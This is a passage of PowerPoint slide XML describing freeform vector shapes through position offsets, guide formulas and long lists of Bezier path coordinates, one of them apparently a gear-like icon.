                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D36634B-C448-E745-B194-B2945ADEC496}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8648701" y="4040188"/>
              <a:ext cx="1087438" cy="973138"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 320 w 508"/>
                <a:gd name="T1" fmla="*/ 1 h 454"/>
                <a:gd name="T2" fmla="*/ 290 w 508"/>
                <a:gd name="T3" fmla="*/ 37 h 454"/>
                <a:gd name="T4" fmla="*/ 270 w 508"/>
                <a:gd name="T5" fmla="*/ 30 h 454"/>
                <a:gd name="T6" fmla="*/ 255 w 508"/>
                <a:gd name="T7" fmla="*/ 63 h 454"/>
                <a:gd name="T8" fmla="*/ 269 w 508"/>
                <a:gd name="T9" fmla="*/ 77 h 454"/>
                <a:gd name="T10" fmla="*/ 245 w 508"/>
                <a:gd name="T11" fmla="*/ 89 h 454"/>
                <a:gd name="T12" fmla="*/ 206 w 508"/>
                <a:gd name="T13" fmla="*/ 53 h 454"/>
                <a:gd name="T14" fmla="*/ 191 w 508"/>
                <a:gd name="T15" fmla="*/ 63 h 454"/>
                <a:gd name="T16" fmla="*/ 160 w 508"/>
                <a:gd name="T17" fmla="*/ 34 h 454"/>
                <a:gd name="T18" fmla="*/ 120 w 508"/>
                <a:gd name="T19" fmla="*/ 30 h 454"/>
                <a:gd name="T20" fmla="*/ 85 w 508"/>
                <a:gd name="T21" fmla="*/ 72 h 454"/>
                <a:gd name="T22" fmla="*/ 71 w 508"/>
                <a:gd name="T23" fmla="*/ 62 h 454"/>
                <a:gd name="T24" fmla="*/ 47 w 508"/>
                <a:gd name="T25" fmla="*/ 63 h 454"/>
                <a:gd name="T26" fmla="*/ 43 w 508"/>
                <a:gd name="T27" fmla="*/ 117 h 454"/>
                <a:gd name="T28" fmla="*/ 13 w 508"/>
                <a:gd name="T29" fmla="*/ 134 h 454"/>
                <a:gd name="T30" fmla="*/ 3 w 508"/>
                <a:gd name="T31" fmla="*/ 182 h 454"/>
                <a:gd name="T32" fmla="*/ 38 w 508"/>
                <a:gd name="T33" fmla="*/ 218 h 454"/>
                <a:gd name="T34" fmla="*/ 32 w 508"/>
                <a:gd name="T35" fmla="*/ 242 h 454"/>
                <a:gd name="T36" fmla="*/ 507 w 508"/>
                <a:gd name="T37" fmla="*/ 158 h 454"/>
                <a:gd name="T38" fmla="*/ 507 w 508"/>
                <a:gd name="T39" fmla="*/ 157 h 454"/>
                <a:gd name="T40" fmla="*/ 507 w 508"/>
                <a:gd name="T41" fmla="*/ 154 h 454"/>
                <a:gd name="T42" fmla="*/ 507 w 508"/>
                <a:gd name="T43" fmla="*/ 154 h 454"/>
                <a:gd name="T44" fmla="*/ 507 w 508"/>
                <a:gd name="T45" fmla="*/ 154 h 454"/>
                <a:gd name="T46" fmla="*/ 507 w 508"/>
                <a:gd name="T47" fmla="*/ 153 h 454"/>
                <a:gd name="T48" fmla="*/ 507 w 508"/>
                <a:gd name="T49" fmla="*/ 153 h 454"/>
                <a:gd name="T50" fmla="*/ 507 w 508"/>
                <a:gd name="T51" fmla="*/ 152 h 454"/>
                <a:gd name="T52" fmla="*/ 508 w 508"/>
                <a:gd name="T53" fmla="*/ 152 h 454"/>
                <a:gd name="T54" fmla="*/ 508 w 508"/>
                <a:gd name="T55" fmla="*/ 151 h 454"/>
                <a:gd name="T56" fmla="*/ 508 w 508"/>
                <a:gd name="T57" fmla="*/ 150 h 454"/>
                <a:gd name="T58" fmla="*/ 508 w 508"/>
                <a:gd name="T59" fmla="*/ 150 h 454"/>
                <a:gd name="T60" fmla="*/ 508 w 508"/>
                <a:gd name="T61" fmla="*/ 150 h 454"/>
                <a:gd name="T62" fmla="*/ 508 w 508"/>
                <a:gd name="T63" fmla="*/ 149 h 454"/>
                <a:gd name="T64" fmla="*/ 508 w 508"/>
                <a:gd name="T65" fmla="*/ 149 h 454"/>
                <a:gd name="T66" fmla="*/ 508 w 508"/>
                <a:gd name="T67" fmla="*/ 148 h 454"/>
                <a:gd name="T68" fmla="*/ 508 w 508"/>
                <a:gd name="T69" fmla="*/ 148 h 454"/>
                <a:gd name="T70" fmla="*/ 508 w 508"/>
                <a:gd name="T71" fmla="*/ 147 h 454"/>
                <a:gd name="T72" fmla="*/ 508 w 508"/>
                <a:gd name="T73" fmla="*/ 147 h 454"/>
                <a:gd name="T74" fmla="*/ 508 w 508"/>
                <a:gd name="T75" fmla="*/ 146 h 454"/>
                <a:gd name="T76" fmla="*/ 508 w 508"/>
                <a:gd name="T77" fmla="*/ 145 h 454"/>
                <a:gd name="T78" fmla="*/ 508 w 508"/>
                <a:gd name="T79" fmla="*/ 145 h 454"/>
                <a:gd name="T80" fmla="*/ 508 w 508"/>
                <a:gd name="T81" fmla="*/ 144 h 454"/>
                <a:gd name="T82" fmla="*/ 508 w 508"/>
                <a:gd name="T83" fmla="*/ 144 h 454"/>
                <a:gd name="T84" fmla="*/ 508 w 508"/>
                <a:gd name="T85" fmla="*/ 143 h 454"/>
                <a:gd name="T86" fmla="*/ 508 w 508"/>
                <a:gd name="T87" fmla="*/ 143 h 454"/>
                <a:gd name="T88" fmla="*/ 508 w 508"/>
                <a:gd name="T89" fmla="*/ 143 h 454"/>
                <a:gd name="T90" fmla="*/ 508 w 508"/>
                <a:gd name="T91" fmla="*/ 142 h 454"/>
                <a:gd name="T92" fmla="*/ 507 w 508"/>
                <a:gd name="T93" fmla="*/ 130 h 454"/>
                <a:gd name="T94" fmla="*/ 399 w 508"/>
                <a:gd name="T95" fmla="*/ 25 h 454"/>
                <a:gd name="T96" fmla="*/ 368 w 508"/>
                <a:gd name="T97" fmla="*/ 7 h 454"/>
                <a:gd name="T98" fmla="*/ 325 w 508"/>
                <a:gd name="T99"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8" h="454">
                  <a:moveTo>
                    <a:pt x="325" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="324" y="0"/>
                    <a:pt x="322" y="1"/>
                    <a:pt x="320" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="298" y="7"/>
                    <a:pt x="295" y="5"/>
                    <a:pt x="301" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="303" y="35"/>
                    <a:pt x="297" y="37"/>
                    <a:pt x="290" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="37"/>
                    <a:pt x="282" y="36"/>
                    <a:pt x="279" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="33"/>
                    <a:pt x="273" y="30"/>
                    <a:pt x="270" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="30"/>
                    <a:pt x="267" y="31"/>
                    <a:pt x="265" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="262" y="40"/>
                    <a:pt x="246" y="58"/>
                    <a:pt x="255" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="66"/>
                    <a:pt x="260" y="68"/>
                    <a:pt x="262" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="263" y="73"/>
                    <a:pt x="268" y="74"/>
                    <a:pt x="269" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="86"/>
                    <a:pt x="263" y="92"/>
                    <a:pt x="254" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="92"/>
                    <a:pt x="247" y="91"/>
                    <a:pt x="245" y="89"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="79"/>
                    <a:pt x="225" y="66"/>
                    <a:pt x="214" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="211" y="55"/>
                    <a:pt x="208" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="53"/>
                    <a:pt x="201" y="56"/>
                    <a:pt x="199" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="60"/>
                    <a:pt x="195" y="63"/>
                    <a:pt x="191" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="63"/>
                    <a:pt x="189" y="63"/>
                    <a:pt x="188" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="55"/>
                    <a:pt x="167" y="37"/>
                    <a:pt x="160" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="29"/>
                    <a:pt x="151" y="28"/>
                    <a:pt x="143" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="28"/>
                    <a:pt x="124" y="30"/>
                    <a:pt x="120" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="30"/>
                    <a:pt x="107" y="46"/>
                    <a:pt x="107" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="65"/>
                    <a:pt x="93" y="72"/>
                    <a:pt x="85" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="72"/>
                    <a:pt x="80" y="71"/>
                    <a:pt x="79" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="69"/>
                    <a:pt x="73" y="64"/>
                    <a:pt x="71" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="57"/>
                    <a:pt x="62" y="54"/>
                    <a:pt x="59" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="53" y="56"/>
                    <a:pt x="47" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="78"/>
                    <a:pt x="20" y="81"/>
                    <a:pt x="34" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="104"/>
                    <a:pt x="48" y="107"/>
                    <a:pt x="43" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="133"/>
                    <a:pt x="40" y="134"/>
                    <a:pt x="24" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="134"/>
                    <a:pt x="18" y="134"/>
                    <a:pt x="13" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="134"/>
                    <a:pt x="3" y="134"/>
                    <a:pt x="3" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="141"/>
                    <a:pt x="1" y="177"/>
                    <a:pt x="3" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="187"/>
                    <a:pt x="27" y="210"/>
                    <a:pt x="32" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="214"/>
                    <a:pt x="37" y="217"/>
                    <a:pt x="38" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="223"/>
                    <a:pt x="24" y="227"/>
                    <a:pt x="24" y="233"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="236"/>
                    <a:pt x="30" y="240"/>
                    <a:pt x="32" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="248"/>
                    <a:pt x="146" y="357"/>
                    <a:pt x="243" y="454"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="430"/>
                    <a:pt x="500" y="308"/>
                    <a:pt x="507" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="158"/>
                    <a:pt x="507" y="158"/>
                    <a:pt x="507" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="157"/>
                    <a:pt x="507" y="157"/>
                    <a:pt x="507" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="157"/>
                    <a:pt x="507" y="157"/>
                    <a:pt x="507" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="156"/>
                    <a:pt x="507" y="155"/>
                    <a:pt x="507" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="154"/>
                    <a:pt x="507" y="154"/>
                    <a:pt x="507" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="154"/>
                    <a:pt x="507" y="154"/>
                    <a:pt x="507" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="154"/>
                    <a:pt x="507" y="154"/>
                    <a:pt x="507" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="154"/>
                    <a:pt x="507" y="154"/>
                    <a:pt x="507" y="154"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="154"/>
                    <a:pt x="507" y="153"/>
                    <a:pt x="507" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="153"/>
                    <a:pt x="507" y="153"/>
                    <a:pt x="507" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="153"/>
                    <a:pt x="507" y="153"/>
                    <a:pt x="507" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="153"/>
                    <a:pt x="507" y="153"/>
                    <a:pt x="507" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="153"/>
                    <a:pt x="507" y="153"/>
                    <a:pt x="507" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="507" y="152"/>
                    <a:pt x="507" y="152"/>
                    <a:pt x="507" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="152"/>
                    <a:pt x="508" y="152"/>
                    <a:pt x="508" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="152"/>
                    <a:pt x="508" y="152"/>
                    <a:pt x="508" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="152"/>
                    <a:pt x="508" y="152"/>
                    <a:pt x="508" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="151"/>
                    <a:pt x="508" y="151"/>
                    <a:pt x="508" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="151"/>
                    <a:pt x="508" y="151"/>
                    <a:pt x="508" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="151"/>
                    <a:pt x="508" y="151"/>
                    <a:pt x="508" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="150"/>
                    <a:pt x="508" y="150"/>
                    <a:pt x="508" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="150"/>
                    <a:pt x="508" y="150"/>
                    <a:pt x="508" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="150"/>
                    <a:pt x="508" y="150"/>
                    <a:pt x="508" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="150"/>
                    <a:pt x="508" y="150"/>
                    <a:pt x="508" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="149"/>
                    <a:pt x="508" y="149"/>
                    <a:pt x="508" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="149"/>
                    <a:pt x="508" y="149"/>
                    <a:pt x="508" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="149"/>
                    <a:pt x="508" y="149"/>
                    <a:pt x="508" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="149"/>
                    <a:pt x="508" y="149"/>
                    <a:pt x="508" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="148"/>
                    <a:pt x="508" y="148"/>
                    <a:pt x="508" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="148"/>
                    <a:pt x="508" y="148"/>
                    <a:pt x="508" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="148"/>
                    <a:pt x="508" y="148"/>
                    <a:pt x="508" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="148"/>
                    <a:pt x="508" y="148"/>
                    <a:pt x="508" y="148"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="148"/>
                    <a:pt x="508" y="147"/>
                    <a:pt x="508" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="147"/>
                    <a:pt x="508" y="147"/>
                    <a:pt x="508" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="147"/>
                    <a:pt x="508" y="147"/>
                    <a:pt x="508" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="147"/>
                    <a:pt x="508" y="147"/>
                    <a:pt x="508" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="146"/>
                    <a:pt x="508" y="146"/>
                    <a:pt x="508" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="146"/>
                    <a:pt x="508" y="146"/>
                    <a:pt x="508" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="146"/>
                    <a:pt x="508" y="146"/>
                    <a:pt x="508" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="146"/>
                    <a:pt x="508" y="146"/>
                    <a:pt x="508" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="145"/>
                    <a:pt x="508" y="145"/>
                    <a:pt x="508" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="145"/>
                    <a:pt x="508" y="145"/>
                    <a:pt x="508" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="145"/>
                    <a:pt x="508" y="145"/>
                    <a:pt x="508" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="145"/>
                    <a:pt x="508" y="145"/>
                    <a:pt x="508" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="144"/>
                    <a:pt x="508" y="144"/>
                    <a:pt x="508" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="144"/>
                    <a:pt x="508" y="144"/>
                    <a:pt x="508" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="144"/>
                    <a:pt x="508" y="144"/>
                    <a:pt x="508" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="144"/>
                    <a:pt x="508" y="144"/>
                    <a:pt x="508" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="143"/>
                    <a:pt x="508" y="143"/>
                    <a:pt x="508" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="143"/>
                    <a:pt x="508" y="143"/>
                    <a:pt x="508" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="143"/>
                    <a:pt x="508" y="143"/>
                    <a:pt x="508" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="143"/>
                    <a:pt x="508" y="143"/>
                    <a:pt x="508" y="143"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="142"/>
                    <a:pt x="508" y="142"/>
                    <a:pt x="508" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="142"/>
                    <a:pt x="508" y="142"/>
                    <a:pt x="508" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="142"/>
                    <a:pt x="508" y="142"/>
                    <a:pt x="508" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="508" y="138"/>
                    <a:pt x="508" y="134"/>
                    <a:pt x="507" y="130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="459" y="82"/>
                    <a:pt x="421" y="44"/>
                    <a:pt x="414" y="40"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="36"/>
                    <a:pt x="404" y="28"/>
                    <a:pt x="399" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="395" y="21"/>
                    <a:pt x="392" y="19"/>
                    <a:pt x="387" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="377" y="10"/>
                    <a:pt x="372" y="7"/>
                    <a:pt x="368" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="7"/>
                    <a:pt x="360" y="11"/>
                    <a:pt x="353" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="19"/>
                    <a:pt x="339" y="0"/>
                    <a:pt x="325" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="77498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61" name="Freeform 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EDD4A89-2392-0F4E-A457-5563A3D6E8A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8655051" y="4105275"/>
              <a:ext cx="554038" cy="554038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 225 w 259"/>
                <a:gd name="T1" fmla="*/ 104 h 259"/>
                <a:gd name="T2" fmla="*/ 237 w 259"/>
                <a:gd name="T3" fmla="*/ 58 h 259"/>
                <a:gd name="T4" fmla="*/ 237 w 259"/>
                <a:gd name="T5" fmla="*/ 54 h 259"/>
                <a:gd name="T6" fmla="*/ 202 w 259"/>
                <a:gd name="T7" fmla="*/ 22 h 259"/>
                <a:gd name="T8" fmla="*/ 155 w 259"/>
                <a:gd name="T9" fmla="*/ 34 h 259"/>
                <a:gd name="T10" fmla="*/ 152 w 259"/>
                <a:gd name="T11" fmla="*/ 0 h 259"/>
                <a:gd name="T12" fmla="*/ 104 w 259"/>
                <a:gd name="T13" fmla="*/ 2 h 259"/>
                <a:gd name="T14" fmla="*/ 79 w 259"/>
                <a:gd name="T15" fmla="*/ 44 h 259"/>
                <a:gd name="T16" fmla="*/ 56 w 259"/>
                <a:gd name="T17" fmla="*/ 21 h 259"/>
                <a:gd name="T18" fmla="*/ 54 w 259"/>
                <a:gd name="T19" fmla="*/ 22 h 259"/>
                <a:gd name="T20" fmla="*/ 21 w 259"/>
                <a:gd name="T21" fmla="*/ 56 h 259"/>
                <a:gd name="T22" fmla="*/ 44 w 259"/>
                <a:gd name="T23" fmla="*/ 79 h 259"/>
                <a:gd name="T24" fmla="*/ 3 w 259"/>
                <a:gd name="T25" fmla="*/ 104 h 259"/>
                <a:gd name="T26" fmla="*/ 0 w 259"/>
                <a:gd name="T27" fmla="*/ 152 h 259"/>
                <a:gd name="T28" fmla="*/ 34 w 259"/>
                <a:gd name="T29" fmla="*/ 155 h 259"/>
                <a:gd name="T30" fmla="*/ 22 w 259"/>
                <a:gd name="T31" fmla="*/ 201 h 259"/>
                <a:gd name="T32" fmla="*/ 22 w 259"/>
                <a:gd name="T33" fmla="*/ 205 h 259"/>
                <a:gd name="T34" fmla="*/ 56 w 259"/>
                <a:gd name="T35" fmla="*/ 238 h 259"/>
                <a:gd name="T36" fmla="*/ 79 w 259"/>
                <a:gd name="T37" fmla="*/ 215 h 259"/>
                <a:gd name="T38" fmla="*/ 104 w 259"/>
                <a:gd name="T39" fmla="*/ 256 h 259"/>
                <a:gd name="T40" fmla="*/ 152 w 259"/>
                <a:gd name="T41" fmla="*/ 259 h 259"/>
                <a:gd name="T42" fmla="*/ 155 w 259"/>
                <a:gd name="T43" fmla="*/ 225 h 259"/>
                <a:gd name="T44" fmla="*/ 201 w 259"/>
                <a:gd name="T45" fmla="*/ 237 h 259"/>
                <a:gd name="T46" fmla="*/ 237 w 259"/>
                <a:gd name="T47" fmla="*/ 205 h 259"/>
                <a:gd name="T48" fmla="*/ 237 w 259"/>
                <a:gd name="T49" fmla="*/ 201 h 259"/>
                <a:gd name="T50" fmla="*/ 225 w 259"/>
                <a:gd name="T51" fmla="*/ 155 h 259"/>
                <a:gd name="T52" fmla="*/ 259 w 259"/>
                <a:gd name="T53" fmla="*/ 152 h 259"/>
                <a:gd name="T54" fmla="*/ 256 w 259"/>
                <a:gd name="T55" fmla="*/ 104 h 259"/>
                <a:gd name="T56" fmla="*/ 137 w 259"/>
                <a:gd name="T57" fmla="*/ 176 h 259"/>
                <a:gd name="T58" fmla="*/ 83 w 259"/>
                <a:gd name="T59" fmla="*/ 122 h 259"/>
                <a:gd name="T60" fmla="*/ 129 w 259"/>
                <a:gd name="T61" fmla="*/ 82 h 259"/>
                <a:gd name="T62" fmla="*/ 176 w 259"/>
                <a:gd name="T63" fmla="*/ 13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9" h="259">
                  <a:moveTo>
                    <a:pt x="256" y="104"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="104"/>
                    <a:pt x="225" y="104"/>
                    <a:pt x="225" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="96"/>
                    <a:pt x="220" y="87"/>
                    <a:pt x="215" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="58"/>
                    <a:pt x="237" y="58"/>
                    <a:pt x="237" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="57"/>
                    <a:pt x="238" y="57"/>
                    <a:pt x="238" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="55"/>
                    <a:pt x="238" y="55"/>
                    <a:pt x="237" y="54"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="22"/>
                    <a:pt x="205" y="22"/>
                    <a:pt x="205" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="21"/>
                    <a:pt x="202" y="21"/>
                    <a:pt x="202" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="44"/>
                    <a:pt x="179" y="44"/>
                    <a:pt x="179" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="39"/>
                    <a:pt x="163" y="36"/>
                    <a:pt x="155" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="2"/>
                    <a:pt x="155" y="2"/>
                    <a:pt x="155" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="1"/>
                    <a:pt x="154" y="0"/>
                    <a:pt x="152" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="0"/>
                    <a:pt x="106" y="0"/>
                    <a:pt x="106" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="0"/>
                    <a:pt x="104" y="1"/>
                    <a:pt x="104" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="34"/>
                    <a:pt x="104" y="34"/>
                    <a:pt x="104" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="36"/>
                    <a:pt x="87" y="39"/>
                    <a:pt x="79" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="22"/>
                    <a:pt x="58" y="22"/>
                    <a:pt x="58" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="22"/>
                    <a:pt x="57" y="21"/>
                    <a:pt x="56" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="21"/>
                    <a:pt x="56" y="21"/>
                    <a:pt x="56" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="21"/>
                    <a:pt x="55" y="22"/>
